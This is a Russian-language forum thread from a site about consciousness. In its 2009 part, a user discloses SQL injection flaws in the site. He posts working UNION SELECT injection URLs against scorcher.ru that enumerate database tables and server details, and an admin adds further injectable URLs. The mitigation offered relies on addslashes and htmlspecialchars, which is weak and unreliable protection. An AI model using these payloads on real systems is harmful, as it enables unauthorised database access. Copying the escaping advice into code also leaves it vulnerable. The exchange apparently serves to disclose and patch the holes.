Ознакомьтесь с Условиями пребывания на сайте Форнит Игнорирование означет безусловное согласие. СОГЛАСЕН
ВХОД
 
 
Привет! Правила | Свежее | Чат | Подписка
Чтобы оставлять сообщения нужно авторизоваться.

Тема форума: «Об автохрокинге»

Сообщений: 19 Просмотров: 19860 | Вся тема для печати
1 2
 
fornit
Jr. Poster

Сообщений: 17
список всех сообщений
clons
Сообщение № 226 показать отдельно Май 20, 2003, 07:29:35 PM
ответ -только после авторизации
Наконец дотянулись руки доделать систему автохрюкинга
Идея запатентована
Теперь каждый желающий может грохнуть этот сайт одним из двух предлагаемых способов. Если, к примеру, мама-папа-муж-жена не желает, чтобы сынок-дочка-жена-муж лазили здесь, достаточно хрюкнуть этот сайт, и любознательное существо останется без запретного яблока
Мера своевременная, потому как самое интересное здесь еще впереди.

Метка админа:

 
Светлана
Sr. Poster


Сообщений: 360


личная фото-галереясписок всех сообщений
clons
Сообщение № 228 показать отдельно Май 20, 2003, 08:40:13 PM
ответ -только после авторизации
Николай
И что же это за способы? 8) И зачем хрюкать сайт, когда он еще толком-то и не раскручен?

Метка админа:

 
Светлана
Sr. Poster


Сообщений: 360


личная фото-галереясписок всех сообщений
clons
Сообщение № 229 показать отдельно Май 20, 2003, 09:06:56 PM
ответ -только после авторизации
Второй вопрос снимается с повестки дня. :D... Я слишком, иногда, тороплюсь с нажатием кнопки "Отправить"

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 12275


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 231 показать отдельно Май 20, 2003, 09:57:06 PM
ответ -только после авторизации
Можно не бояться зайти на саму страничку автохрюкинга. Процесс пойдет только после нажатия одной из двух кнопок.


p.s. Допускаю, что мое утверждение может быть неверно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
Светлана
Sr. Poster


Сообщений: 360


личная фото-галереясписок всех сообщений
clons
Сообщение № 233 показать отдельно Май 20, 2003, 10:42:01 PM
ответ -только после авторизации
Перспектива процесса автохрюкинга очень заманчива А восстановлению сайт подлежит после нажатия одной из кнопок?

Метка админа:

 
Namor
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 4


личная фото-галереясписок всех сообщений
clons
Сообщение № 240 показать отдельно Май 22, 2003, 01:12:35 AM
ответ -только после авторизации
Опять меня стёрли. :'(
Администрация, я буду жаловаться!

Хрюкинг - клёвая штука. Хочу себе такую-же на сайт, и обращаюсь с официальным запросом к корпорации Fornitsoft о возможности лицензирования этой технологии.

Я сначала думал что это такой способ отстрела неугодных юзеров (типа меня). А оказывается это способ суицида для них ???

Ну, в общем, хочу патент

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 12275


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 246 показать отдельно Май 22, 2003, 08:57:32 AM
ответ -только после авторизации
Я тебя не стирал!!! Ты так и торчишь от 22 марта в регистрации Roman-ом! Пароль забыл? Могу напомнить, если хочешь в письме!
Насчет использования хрюкинга у тебя на сайте – никаких возражений. А нельзя ли попросить тебя в ответ сделать статейку для этого сайта о флеше в смысле программирования и т.д.?


p.s. Допускаю, что мое утверждение может быть неверно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
Ласточка (гость)
список всех сообщений
clons
Сообщение № 291 показать отдельно Май 24, 2003, 10:41:08 PM
ответ -только после авторизации
Ну. товарищ Nan! И садист же ты! ;D Это я по поводу твоей системы автохрюка - способа повышения адреналина в крови на 5 минут для всех излишне любопытствующих 8) ;D

Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14297 показать отдельно Июнь 09, 2009, 02:00:55 PM
ответ -только после авторизации

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 12275


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 14298 показать отдельно Июнь 09, 2009, 02:45:37 PM
ответ -только после авторизации

дешевая инъекция.. Нужно еще немало знать, чтобы навредить. Хотя бы именя таблиц. Ну а если кто-то сильно навредит, то в логах по его ip обращусь к провайдеру, найду голубчика о будет он сильно горевать в итоге. А сайт быстро восстановлю. Дырки всегда можно найти. Люди ходят по улице без шлемов и любой может кирпичем ударить.

А пароль шифрованный :)

Короче, каждый сам решает преступник он или нет. Воры, к примеру, в точности как хакеры, гордятся своим умением потрошить лохов. Хакер - ничем не лучше вора.

Но спасибо, исправил защиту...



p.s. Допускаю, что мое утверждение может быть неверно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14300 показать отдельно Июнь 09, 2009, 03:24:35 PM
ответ -только после авторизации
ух как срашно )) давай, юзай, айпиха есть, я даже не через проксю юзал индж ))


http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UNION/**/SELECT/**/0,concat_Ws(0x0b,table_name,column_name),2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1

Перебирай лимитом все свои таблицы ))

хотел бы навредить, поверь уже давно это сделал бы и тем более для тебя не кинул бы чтобы ты её латал ))

"дешевая инъекция"
а какая еще есть не дешевая индж?

http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UnION/**/SELECT/**/0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9


чел то что ты фильтр кинул тебе не поможет ))

Надо сделать следующее

if !is_numeric($_POST['id']) die('fuck off');


также когда не цифровое значение

$id=addslashes($id);
$id=htmlspecialchars($id);
mysql_query(SELECT * FROM WHERE myid='$id');

обьязательно в запросах ставь ' и слешируй удачи

Метка админа:

 
nan
Имеет права полного администратора сайта - админ

Род: Мужской
Сообщений: 12275


E-Mail
личная фото-галерея
Оценок: 39
список всех сообщений
clons
Сообщение № 14301 показать отдельно Июнь 09, 2009, 03:44:52 PM
ответ -только после авторизации

все, сибо еще разок :) а че ты такой агрессивный?

 



p.s. Допускаю, что мое утверждение может быть неверно, поэтому прошу показывать, что именно и почему неверно и запрашивать объяснения, если что-то непонятно.
Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14309 показать отдельно Июнь 09, 2009, 06:56:38 PM
ответ -только после авторизации
с чего ты взял что я агрессивный )) я споконый как доска )) лан, кильни мой акк с сайта чтобы на мыло мессаги не приходили и проверь все переменные

Метка админа:

 
xssql
Newbie


Сообщений: 5
!!! список всех сообщений
clons
Сообщение № 14310 показать отдельно Июнь 09, 2009, 06:58:19 PM
ответ -только после авторизации
в этой теме ввел что надо тож есть баги, исправляй, подставляй ' там где цифры, буш баги видеть

Метка админа:

 
Айк
Имеет права полного администратора сайта - админ

Сообщений: 3768
!!!
личная фото-галерея
Оценок: 4
список всех сообщений
clons
Туда же

http://scorcher.ru/journal/show_news.php?id='
http://scorcher.ru/forum/index.php?board=7&action=display&threadid='&start=30

Как вариант, есть проги вроде xspider. Можно поставить копию сайта на локальную виртуальную машину и проверить с помощью сканера.

Для функции mysql_query можно написать функцию обёртки, которая бы фильтровала запросы к БД и одновременно делала лог запросов, которые вызвали ошибку. Это самый простой, хоть и самый ненадёжный способ.

Вторая вариация дубовых способов: фильтровать все GET/POST запросы на моменте первого обращения к PHP коду. Поскольку переменных, которые изменяются извне не так уж много, написать такой фильтр несложно и достаточно вставить его в одном месте, например config.php (setting.php) файле, лишь бы этот файл обязательно подключался к скриптам в самом начале.

О дырах форума можно подробнее узнать по ссылке:

securityvulns.ru

В поиске ввести: "Yabb SE SQL Injection" или "Yabb SE exploit", "Yabb SE xss"

Дабы не своровали FTP пароли, пока будешь лазить по таким сайтам, нужно установить Avira ( http://free-av.com ) и усердно молится
« Последнее редактирование: 2009-06-10 00:06:31 Синь »

Метка админа:

 
1 2 Статистика:
Всего Тем: 1925 Всего Сообщений: 47850 Всего Участников: 5200 Последний зарегистрировавшийся: kghkgklg
Страница статистики форума | Список пользователей | Список анлимитов
Последняя из новостей:
Трилогия: Основы фундаментальной теории сознания.

Обнаружен организм с крупнейшим геномом
Новокаледонский вид вилочного папоротника Tmesipteris oblanceolata, произрастающий в Новой Каледонии, имеет геном размером 160,45 гигапары, что более чем в 50 раз превышает размер генома человека.
Тематическая статья: Тема осмысления

Рецензия: Рецензия на статью

Топик ТК: Главное преимущество модели Beast
Пользователи на форуме:

Из коллекции изречений:
>>показать еще...